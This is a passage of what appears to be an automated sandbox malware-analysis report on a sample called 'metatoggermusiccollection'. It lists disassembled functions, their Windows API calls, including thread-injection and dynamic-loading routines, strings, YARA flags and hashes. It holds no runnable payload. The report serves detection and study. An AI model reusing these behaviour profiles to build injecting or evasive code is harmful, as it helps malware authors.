                                                                              • Part of subcall function 02AE8442: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 02AE92CC
                                                                              • Part of subcall function 02AE8442: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 02AE92DF
                                                                            • __mtinitlocks.LIBCMT ref: 02AE5CD9
                                                                            • __mtterm.LIBCMT ref: 02AE5CE2
                                                                              • Part of subcall function 02AE5D4A: RtlDeleteCriticalSection.NTDLL(00000000), ref: 02AE8878
                                                                              • Part of subcall function 02AE5D4A: _free.LIBCMT ref: 02AE887F
                                                                              • Part of subcall function 02AE5D4A: RtlDeleteCriticalSection.NTDLL(02B03978), ref: 02AE88A1
                                                                            • __calloc_crt.LIBCMT ref: 02AE5D07
                                                                            • __initptd.LIBCMT ref: 02AE5D29
                                                                            • GetCurrentThreadId.KERNEL32 ref: 02AE5D30
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                                            • String ID:
                                                                            • API String ID: 3567560977-0
                                                                            • Opcode ID: 596d73f6291512ecdd2678efef070b14ef5e48c6a0f0a65fb2306674d64e66cd
                                                                            • Instruction ID: 6d18e6c83e584e84aee4740824497e2b17159f4d008469994805fcc44c5b6556
                                                                            • Opcode Fuzzy Hash: 596d73f6291512ecdd2678efef070b14ef5e48c6a0f0a65fb2306674d64e66cd
                                                                            • Instruction Fuzzy Hash: 69F02432D987221EEE64B7B97ECE25E2782EF01738B600A59E053CA0E0FF1988034951
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02AE3404 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,?,02AE33B6,00000000), ref: 02AE341E
                                                                            • GetProcAddress.KERNEL32(00000000), ref: 02AE3425
                                                                            • RtlEncodePointer.NTDLL(00000000), ref: 02AE3431
                                                                            • RtlDecodePointer.NTDLL(00000001), ref: 02AE344E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                            • String ID: RoInitialize$combase.dll
                                                                            • API String ID: 3489934621-340411864
                                                                            • Opcode ID: f93c3e3d6115af527d95d19df353b11c82a4ebc59597f587f31469d0b0e74d9e
                                                                            • Instruction ID: 32346c3aeb6a4e388a1059bf00fc8da5f983069339526d4a69346b771b384433
                                                                            • Opcode Fuzzy Hash: f93c3e3d6115af527d95d19df353b11c82a4ebc59597f587f31469d0b0e74d9e
                                                                            • Instruction Fuzzy Hash: 12E0C970ED0210ABEE515BB09CC9F153679BB10787F4088A0B206D6194DFB980798A18
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02AE34D9 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,02AE33F3), ref: 02AE34F3
                                                                            • GetProcAddress.KERNEL32(00000000), ref: 02AE34FA
                                                                            • RtlEncodePointer.NTDLL(00000000), ref: 02AE3505
                                                                            • RtlDecodePointer.NTDLL(02AE33F3), ref: 02AE3520
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                            • String ID: RoUninitialize$combase.dll
                                                                            • API String ID: 3489934621-2819208100
                                                                            • Opcode ID: 48831fc206c904d6b50a6a48e767dd9654df6e885b63edd9c1783fa87c8de86c
                                                                            • Instruction ID: 1de902d1431fd29b05d6c013cf5f5925aba18c9fcf66c89bf7074cd4f9e3e47e
                                                                            • Opcode Fuzzy Hash: 48831fc206c904d6b50a6a48e767dd9654df6e885b63edd9c1783fa87c8de86c
                                                                            • Instruction Fuzzy Hash: 18E09AB0DD0300AFEFA15FE0AC89F1577A9B714746F104854F307A2258DF7C91398A14
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02AE1E70 Relevance: 10.2, APIs: 8, Instructions: 154memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • TlsGetValue.KERNEL32(00000025,3156A85A,?,?,?,?,00000000,02AF69F8,000000FF,02AE210A), ref: 02AE1EAA
                                                                            • TlsSetValue.KERNEL32(00000025,02AE210A,?,?,00000000), ref: 02AE1F17
                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02AE1F41
                                                                            • HeapFree.KERNEL32(00000000), ref: 02AE1F44
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: HeapValue$FreeProcess
                                                                            • String ID:
                                                                            • API String ID: 1812714009-0
                                                                            • Opcode ID: 082142cbedc6cf339c644365357df02a9af71294023b68f251ed935352aafa27
                                                                            • Instruction ID: 2effe78445da269f9caf4eeff0e030f9d319c5b4e2f3795b763d6e6884968e40
                                                                            • Opcode Fuzzy Hash: 082142cbedc6cf339c644365357df02a9af71294023b68f251ed935352aafa27
                                                                            • Instruction Fuzzy Hash: C8518031A042549FDB20DF69C888F2ABBE4FF45764F05865AF85E97290DB74EC02CB91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02AF55C0 Relevance: 9.3, APIs: 6, Instructions: 276COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _ValidateScopeTableHandlers.LIBCMT ref: 02AF56D0
                                                                            • __FindPESection.LIBCMT ref: 02AF56EA
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FindHandlersScopeSectionTableValidate
                                                                            • String ID:
                                                                            • API String ID: 876702719-0
                                                                            • Opcode ID: a3be726c1157d3d7bb3e0604eb24699f7bb26f0a1e618dcb3ca59daf9841e99d
                                                                            • Instruction ID: e8ce84331bf2a4232c1b47c019d30ed5c0ec7781f9e8f74d4f4715fccf8ba9c8
                                                                            • Opcode Fuzzy Hash: a3be726c1157d3d7bb3e0604eb24699f7bb26f0a1e618dcb3ca59daf9841e99d
                                                                            • Instruction Fuzzy Hash: 24A1BF71E40615CFDB65CF98C9C07A9F7E5FB48364FA84669EE15A7240EB38E801CB90
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00405D6E Relevance: 9.1, APIs: 6, Instructions: 117COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetStringTypeW.KERNEL32(00000001,004065FC,00000001,00000000,00000103,00000001,00000000,00404E93,00200020,00000000,?,00000000,00000000,00000001), ref: 00405DAD
                                                                            • GetStringTypeA.KERNEL32(00000000,00000001,004065F8,00000001,?,?,00000000,00000000,00000001), ref: 00405DC7
                                                                            • GetStringTypeA.KERNEL32(00000000,00000000,?,00000000,00200020,00000103,00000001,00000000,00404E93,00200020,00000000,?,00000000,00000000,00000001), ref: 00405DFB
                                                                            • MultiByteToWideChar.KERNEL32(00404E93,00000002,?,00000000,00000000,00000000,00000103,00000001,00000000,00404E93,00200020,00000000,?,00000000,00000000,00000001), ref: 00405E33
                                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00405E89
                                                                            • GetStringTypeW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00405E9B
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3215362134.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3215362134.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_metatoggermusiccollection.jbxd
                                                                            Similarity
                                                                            • API ID: StringType$ByteCharMultiWide
                                                                            • String ID:
                                                                            • API String ID: 3852931651-0
                                                                            • Opcode ID: 299ca15397ebee838ff06567ddbc0ab6f29b8118cf23d418261883c500b25a22
                                                                            • Instruction ID: 80e02ee10c910d5558e83bb499fc0990029bfad3b9a08e1f349c60d3d592f295
                                                                            • Opcode Fuzzy Hash: 299ca15397ebee838ff06567ddbc0ab6f29b8118cf23d418261883c500b25a22
                                                                            • Instruction Fuzzy Hash: D5416C72540619AFCF109FA4DD85AAF3F69FB08710F10443AF912F6290C3399A619BA9
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02AD1C91 Relevance: 9.0, APIs: 6, Instructions: 39synchronizationthreadinjectionCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 02AD1CB1
                                                                            • CloseHandle.KERNEL32(?), ref: 02AD1CBA
                                                                            • InterlockedExchangeAdd.KERNEL32(02B07244,00000000), ref: 02AD1CC6
                                                                            • TerminateThread.KERNEL32(?,00000000), ref: 02AD1CD4
                                                                            • QueueUserAPC.KERNEL32(02AD1E7C,?,00000000), ref: 02AD1CE1
                                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 02AD1CEC
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Wait$CloseExchangeHandleInterlockedMultipleObjectObjectsQueueSingleTerminateThreadUser
                                                                            • String ID:
                                                                            • API String ID: 1946104331-0
                                                                            • Opcode ID: 236e1e2f1e27fa26b698ac81f9885061577c42cdcff29b3eb6a4e7472f9ff18b
                                                                            • Instruction ID: 3fd2c80e8a8bcedacfba2eba41e19572424dccded1bb9f4acaa3fa113b8788ac
                                                                            • Opcode Fuzzy Hash: 236e1e2f1e27fa26b698ac81f9885061577c42cdcff29b3eb6a4e7472f9ff18b
                                                                            • Instruction Fuzzy Hash: 17F08131540204BFE7105B95EC0DD57FBBCEF45721B004A59F62A82590DF70A911CB60
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02AE0800 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 179windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 02AD9A0C: __EH_prolog.LIBCMT ref: 02AD9A11
                                                                              • Part of subcall function 02AD9A0C: _Allocate.LIBCPMT ref: 02AD9A68
                                                                              • Part of subcall function 02AD9A0C: _memmove.LIBCMT ref: 02AD9ABF
                                                                            • _memset.LIBCMT ref: 02AE0879
                                                                            • FormatMessageA.KERNEL32(00001200,00000000,?,00000400,?,00000010,00000000), ref: 02AE08E2
                                                                            • GetLastError.KERNEL32(?,00000400,?,00000010,00000000), ref: 02AE08EA
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AllocateErrorFormatH_prologLastMessage_memmove_memset
                                                                            • String ID: Unknown error$invalid string position
                                                                            • API String ID: 1854462395-1837348584
                                                                            • Opcode ID: 3147bb404dcaf5ef7e95aa48fcd2ec7423a849af852156cb7006219c6867f3f4
                                                                            • Instruction ID: b947c8b279664643043fefed45bff0a3738e209dab54f7d4635e200f125d5f87
                                                                            • Opcode Fuzzy Hash: 3147bb404dcaf5ef7e95aa48fcd2ec7423a849af852156cb7006219c6867f3f4
                                                                            • Instruction Fuzzy Hash: F051BE70648341DFEB14CF24C890B2FBBE4ABA8744F50092DF492A7691DBB5D54ACF92
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00403112 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 115COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetVersionExA.KERNEL32 ref: 00403131
                                                                            • GetEnvironmentVariableA.KERNEL32(__MSVCRT_HEAP_SELECT,?,00001090), ref: 00403166
                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 004031C6
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3215362134.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3215362134.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_metatoggermusiccollection.jbxd
                                                                            Similarity
                                                                            • API ID: EnvironmentFileModuleNameVariableVersion
                                                                            • String ID: __GLOBAL_HEAP_SELECTED$__MSVCRT_HEAP_SELECT
                                                                            • API String ID: 1385375860-4131005785
                                                                            • Opcode ID: af41626222cda295a30e89e95e8c01aa69820a81ffba76c46a2f88c2c2cc9610
                                                                            • Instruction ID: 15aa791d7551e4111e6245bb3a1b8270ecaa7052e860947edacf4d8c3684a0cc
                                                                            • Opcode Fuzzy Hash: af41626222cda295a30e89e95e8c01aa69820a81ffba76c46a2f88c2c2cc9610
                                                                            • Instruction Fuzzy Hash: 9C3102719412486DEB31AB706C45BDA7F6C9B0A709F2404FFD145FA2C2D6398F898B19
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02AE1870 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 66COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • std::exception::exception.LIBCMT ref: 02AE18BF
                                                                              • Part of subcall function 02AE2413: std::exception::_Copy_str.LIBCMT ref: 02AE242C
                                                                              • Part of subcall function 02AE0C90: __CxxThrowException@8.LIBCMT ref: 02AE0CEE
                                                                            • std::exception::exception.LIBCMT ref: 02AE191E
                                                                            Strings
                                                                            • boost unique_lock has no mutex, xrefs: 02AE18AE
                                                                            • $, xrefs: 02AE1923
                                                                            • boost unique_lock owns already the mutex, xrefs: 02AE190D
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: std::exception::exception$Copy_strException@8Throwstd::exception::_
                                                                            • String ID: $$boost unique_lock has no mutex$boost unique_lock owns already the mutex
                                                                            • API String ID: 2140441600-46888669
                                                                            • Opcode ID: b6dd859f1a381bcf78262e6802ece81625aaa1cda00863619b576be34b26dd19
                                                                            • Instruction ID: 44fabed15e5f9dc71b61308d7ed7b781d5c1a6c85075cff56a038284db0e71f6
                                                                            • Opcode Fuzzy Hash: b6dd859f1a381bcf78262e6802ece81625aaa1cda00863619b576be34b26dd19
                                                                            • Instruction Fuzzy Hash: 4B212BB15483809FD750DF64C58475BBBE9BF88708F404E5DF4A687240DBB99809CF92
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02AE49BC Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 60COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __getptd_noexit.LIBCMT ref: 02AE49C0
                                                                              • Part of subcall function 02AE5BB2: GetLastError.KERNEL32(75920A60,7591F550,02AE5DA0,02AE2F73,7591F550,?,02AD606D,00000104,75920A60,7591F550,ntdll.dll,?,?,?,02AD6504), ref: 02AE5BB4
                                                                              • Part of subcall function 02AE5BB2: __calloc_crt.LIBCMT ref: 02AE5BD5
                                                                              • Part of subcall function 02AE5BB2: __initptd.LIBCMT ref: 02AE5BF7
                                                                              • Part of subcall function 02AE5BB2: GetCurrentThreadId.KERNEL32 ref: 02AE5BFE
                                                                              • Part of subcall function 02AE5BB2: SetLastError.KERNEL32(00000000,02AD606D,00000104,75920A60,7591F550,ntdll.dll,?,?,?,02AD6504), ref: 02AE5C16
                                                                            • __calloc_crt.LIBCMT ref: 02AE49E3
                                                                            • __get_sys_err_msg.LIBCMT ref: 02AE4A01
                                                                            • __invoke_watson.LIBCMT ref: 02AE4A1E
                                                                            Strings
                                                                            • Visual C++ CRT: Not enough memory to complete call to strerror., xrefs: 02AE49CB, 02AE49F1
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ErrorLast__calloc_crt$CurrentThread__get_sys_err_msg__getptd_noexit__initptd__invoke_watson
                                                                            • String ID: Visual C++ CRT: Not enough memory to complete call to strerror.
                                                                            • API String ID: 109275364-798102604
                                                                            • Opcode ID: 115c986498ed13856a207228dd6faff01651b3fe0933a07cd05471e8d85ff7dc
                                                                            • Instruction ID: 3a181e75b68e17ecb1fcbf22de5ea033dd4eb86a921ecd590df5fd7e32a7e73c
                                                                            • Opcode Fuzzy Hash: 115c986498ed13856a207228dd6faff01651b3fe0933a07cd05471e8d85ff7dc
                                                                            • Instruction Fuzzy Hash: B7F05932A847052FEE216A5A5D8063B729DEB98AA4B000526FB87FB200EF25CC034795
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02AD2341 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • InterlockedExchange.KERNEL32(?,00000001), ref: 02AD2350
                                                                            • InterlockedExchange.KERNEL32(?,00000001), ref: 02AD2360
                                                                            • PostQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000,00000000), ref: 02AD2370
                                                                            • GetLastError.KERNEL32 ref: 02AD237A
                                                                              • Part of subcall function 02AD1712: __EH_prolog.LIBCMT ref: 02AD1717
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ExchangeInterlocked$CompletionErrorH_prologLastPostQueuedStatus
                                                                            • String ID: pqcs
                                                                            • API String ID: 1619523792-2559862021
                                                                            • Opcode ID: 1e1162873c71d6b9700b93ba66adf4f92e90d677a0a8960bf06d1b01b8a11919
                                                                            • Instruction ID: 7dbc9c51be320de7c48ef70c74854f7147ea0e26d00264ed8fbd161820ca7c99
                                                                            • Opcode Fuzzy Hash: 1e1162873c71d6b9700b93ba66adf4f92e90d677a0a8960bf06d1b01b8a11919
                                                                            • Instruction Fuzzy Hash: 22F03070980304ABDB10AFB49D49BABB7BCEF00701F00456AE906D3540EF74D915CB91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02AD4030 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 26memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __EH_prolog.LIBCMT ref: 02AD4035
                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 02AD4042
                                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 02AD4049
                                                                            • std::exception::exception.LIBCMT ref: 02AD4063
                                                                              • Part of subcall function 02ADA5FD: __EH_prolog.LIBCMT ref: 02ADA602
                                                                              • Part of subcall function 02ADA5FD: Concurrency::cancellation_token::_FromImpl.LIBCPMT ref: 02ADA611
                                                                              • Part of subcall function 02ADA5FD: __CxxThrowException@8.LIBCMT ref: 02ADA630
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: H_prologHeap$AllocateConcurrency::cancellation_token::_Exception@8FromImplProcessThrowstd::exception::exception
                                                                            • String ID: bad allocation
                                                                            • API String ID: 3112922283-2104205924
                                                                            • Opcode ID: a6bf1cdacf8829b738e8e98a38cd5bf2c545fe561faca14735ffc2749302783a
                                                                            • Instruction ID: 60a3f026d0b6184e6219b603a93bd1f02020a71bd2a84ef64f12848ab7709171
                                                                            • Opcode Fuzzy Hash: a6bf1cdacf8829b738e8e98a38cd5bf2c545fe561faca14735ffc2749302783a
                                                                            • Instruction Fuzzy Hash: 66F05E72D44209ABCB40EFE0CD04BAFB779EF04301F804555FA15A2640DF3C82158F51
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00404842 Relevance: 7.6, APIs: 5, Instructions: 143COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetStartupInfoA.KERNEL32(?), ref: 0040489B
                                                                            • GetFileType.KERNEL32(00000800), ref: 00404941
                                                                            • GetStdHandle.KERNEL32(-000000F6), ref: 0040499A
                                                                            • GetFileType.KERNEL32(00000000), ref: 004049A8
                                                                            • SetHandleCount.KERNEL32 ref: 004049DF
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3215362134.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3215362134.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_metatoggermusiccollection.jbxd
                                                                            Similarity
                                                                            • API ID: FileHandleType$CountInfoStartup
                                                                            • String ID:
                                                                            • API String ID: 1710529072-0
                                                                            • Opcode ID: 56d6159c8425f0dd02e5a81d6ebd8f1304acda9888bee5980fecee2fba5d3342
                                                                            • Instruction ID: 5bba43567eb9c7eebad7166e054eef6f33a3e935d61c9f19950f113686a4cc82
                                                                            • Opcode Fuzzy Hash: 56d6159c8425f0dd02e5a81d6ebd8f1304acda9888bee5980fecee2fba5d3342
                                                                            • Instruction Fuzzy Hash: 585124F25003118BD7208B38CD48B673BA0EB91331F19873AE696BB2E1D738C855875A
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02AE1BC0 Relevance: 7.6, APIs: 5, Instructions: 117COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 02AE1990: CloseHandle.KERNEL32(00000000,3156A85A), ref: 02AE19E1
                                                                              • Part of subcall function 02AE1990: WaitForSingleObject.KERNEL32(?,000000FF,3156A85A,?,?,?,?,3156A85A,02AE1963,3156A85A), ref: 02AE19F8
                                                                            • ReleaseSemaphore.KERNEL32(?,?,00000000), ref: 02AE1C5E
                                                                            • ReleaseSemaphore.KERNEL32(?,?,00000000), ref: 02AE1C7E
                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 02AE1CB7
                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?), ref: 02AE1D0B
                                                                            • SetEvent.KERNEL32(?), ref: 02AE1D12
                                                                              • Part of subcall function 02AD418C: CloseHandle.KERNEL32(00000000,?,02AE1C45), ref: 02AD41B0
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseHandle$ReleaseSemaphore$EventObjectSingleWait
                                                                            • String ID:
                                                                            • API String ID: 4166353394-0
                                                                            • Opcode ID: 00079a8549bcc5584caac04bea91576665b93f8802a63cc6be5eb3748d91b31c
                                                                            • Instruction ID: 9a3523222793f747b1c1c2a5862da2bbad7af594e2ab5e0a61620c91274f23ab
                                                                            • Opcode Fuzzy Hash: 00079a8549bcc5584caac04bea91576665b93f8802a63cc6be5eb3748d91b31c
                                                                            • Instruction Fuzzy Hash: 3041DF706403219FDF25CF28CCC0B1AB7A4EF45724F2406A8EC1ADB295DB35DC528BA5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02AD207C Relevance: 7.6, APIs: 5, Instructions: 100timeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • InterlockedExchange.KERNEL32(?,00000001), ref: 02AD20AC
                                                                            • SetWaitableTimer.KERNEL32(00000000,?,00000001,00000000,00000000,00000000), ref: 02AD20CD
                                                                            • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02AD20D8
                                                                            • InterlockedDecrement.KERNEL32(?), ref: 02AD213E
                                                                            • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02AD21A6
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Interlocked$Exchange$DecrementTimerWaitable
                                                                            • String ID:
                                                                            • API String ID: 1611172436-0
                                                                            • Opcode ID: 9fc5002435d2cbabab74f8ef793dd0a3bb9b608494895ba637a77dff6fb8b5b2
                                                                            • Instruction ID: 2ba9bf259d11c37f2aff05428b0aa798ec93d1dd9f08f611d8a787128259b082
                                                                            • Opcode Fuzzy Hash: 9fc5002435d2cbabab74f8ef793dd0a3bb9b608494895ba637a77dff6fb8b5b2
                                                                            • Instruction Fuzzy Hash: 7A316972544701AFC311DF65D884A6BF7F9EFC8A14F104A1EF99A83651DB30E90ACB91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02ADE02B Relevance: 7.6, APIs: 5, Instructions: 92COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __EH_prolog.LIBCMT ref: 02ADE030
                                                                              • Part of subcall function 02AD1A01: TlsGetValue.KERNEL32 ref: 02AD1A0A
                                                                            • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02ADE0AF
                                                                            • RtlEnterCriticalSection.NTDLL(?), ref: 02ADE0CB
                                                                            • InterlockedIncrement.KERNEL32(02B05180), ref: 02ADE0F0
                                                                            • RtlLeaveCriticalSection.NTDLL(?), ref: 02ADE105
                                                                              • Part of subcall function 02AD27F3: SetWaitableTimer.KERNEL32(00000000,?,000493E0,00000000,00000000,00000000,00000000,00000000,0000000A,00000000), ref: 02AD284E
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CriticalInterlockedSection$EnterExchangeH_prologIncrementLeaveTimerValueWaitable
                                                                            • String ID:
                                                                            • API String ID: 1578506061-0
                                                                            • Opcode ID: 3c146dc9062a9396243d4e4fb6644267ff2b63cd124b5f3c15fa2163f1c22054
                                                                            • Instruction ID: 57e8df93ad94c3b959f532a2f5260633bfe47a2ed5c553e2f05fb0c70445e7cc
                                                                            • Opcode Fuzzy Hash: 3c146dc9062a9396243d4e4fb6644267ff2b63cd124b5f3c15fa2163f1c22054
                                                                            • Instruction Fuzzy Hash: AC3149B1941204DFC750DFA8CA44AAEBBF9BF08310F14455EE94AD7640EB35AA05CFA0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

